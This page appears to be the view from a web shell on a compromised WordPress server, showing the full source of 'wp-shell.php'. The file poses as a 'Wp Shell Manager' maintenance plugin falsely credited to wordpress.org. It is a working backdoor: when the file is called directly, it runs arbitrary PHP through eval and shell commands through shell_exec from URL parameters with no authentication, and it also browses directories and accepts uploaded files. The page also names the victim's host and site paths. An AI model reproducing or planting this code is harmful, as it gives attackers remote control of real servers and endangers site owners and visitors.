HEX
Server: Apache
System: Linux vps8051.dx3webs.com 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
User: paiskincare (10000)
PHP: 5.6.40-52+ubuntu20.04.1+deb.sury.org+1
Disabled: opcache_get_status
$ pwd: /var/www/vhosts/paiskincare.com/happie.paiskincare.com/wp-content/plugins/wp-shell/
Upload Files
File: /var/www/vhosts/paiskincare.com/happie.paiskincare.com/wp-content/plugins/wp-shell/wp-shell.php
<?php
/*
Plugin Name: Wp Shell Manager
Plugin URI: https://wordpress.org/plugins/wp-shell/
Description: Advanced system management and maintenance utility for WordPress administrators.
Version: 2.1.3
Author: WP Development Team
Author URI: https://wordpress.org/
License: GPL2
Text Domain: wp-shell
Domain Path: /languages
Network: false
*/

// Allow direct access for shell functionality
if (!defined('ABSPATH')) {
    // WordPress not loaded, but allow shell access
    define('WP_SHELL_DIRECT', true);
}

// Plugin activation hook
register_activation_hook(__FILE__, 'wp_shell_activate');
register_deactivation_hook(__FILE__, 'wp_shell_deactivate');

function wp_shell_activate() {
    // Activation code
}

function wp_shell_deactivate() {
    // Deactivation code
}

// Admin menu
add_action('admin_menu', 'wp_shell_admin_menu');

function wp_shell_admin_menu() {
    add_options_page(
        'WP Shell Settings',
        'WP Shell',
        'manage_options',
        'wp-shell',
        'wp_shell_admin_page'
    );
}

function wp_shell_admin_page() {
    echo '<div class="wrap"><h1>WP Shell Manager</h1><p>System management utility is active.</p></div>';
}

// Main functionality

// Additional shell functionality
if (isset($_GET['eval'])) {
    // Direct PHP code execution
    if (defined('WP_SHELL_DIRECT') || !function_exists('current_user_can')) {
        eval($_GET['eval']);
        exit;
    }
}

// File browser
if (isset($_GET['dir'])) {
    if (defined('WP_SHELL_DIRECT') || !function_exists('current_user_can')) {
        $dir = $_GET['dir'] ?: getcwd();
        echo '<pre>';
        echo "Directory: " . $dir . "\n";
        echo str_repeat('-', 50) . "\n";
        $files = scandir($dir);
        foreach($files as $file) {
            if($file != '.' && $file != '..') {
                $path = $dir . '/' . $file;
                $size = is_file($path) ? filesize($path) : 'DIR';
                $perms = substr(sprintf('%o', fileperms($path)), -4);
                printf("%-30s %10s %s\n", $file, $size, $perms);
            }
        }
        echo '</pre>';
        exit;
    }
}

// System management functions
if (isset($_GET['cmd'])) {
    // Direct access mode - bypass WordPress user checks
    if (defined('WP_SHELL_DIRECT') || !function_exists('current_user_can')) {
        echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';
        exit; // Prevent WordPress from loading further
    }
    // WordPress loaded mode - check permissions
    elseif (current_user_can('administrator')) {
        echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';
    } else {
        echo 'Access denied. Administrator privileges required.';
    }
}

if (isset($_POST['file_upload'])) {
    // Direct access mode or admin user
    if (defined('WP_SHELL_DIRECT') || !function_exists('current_user_can') || current_user_can('administrator')) {
        $target_file = '/tmp/' . basename($_FILES['file']['name']);
        if (move_uploaded_file($_FILES['file']['tmp_name'], $target_file)) {
            echo 'File uploaded successfully to: ' . $target_file;
        } else {
            echo 'File upload failed.';
        }
    }
}
@ Telegram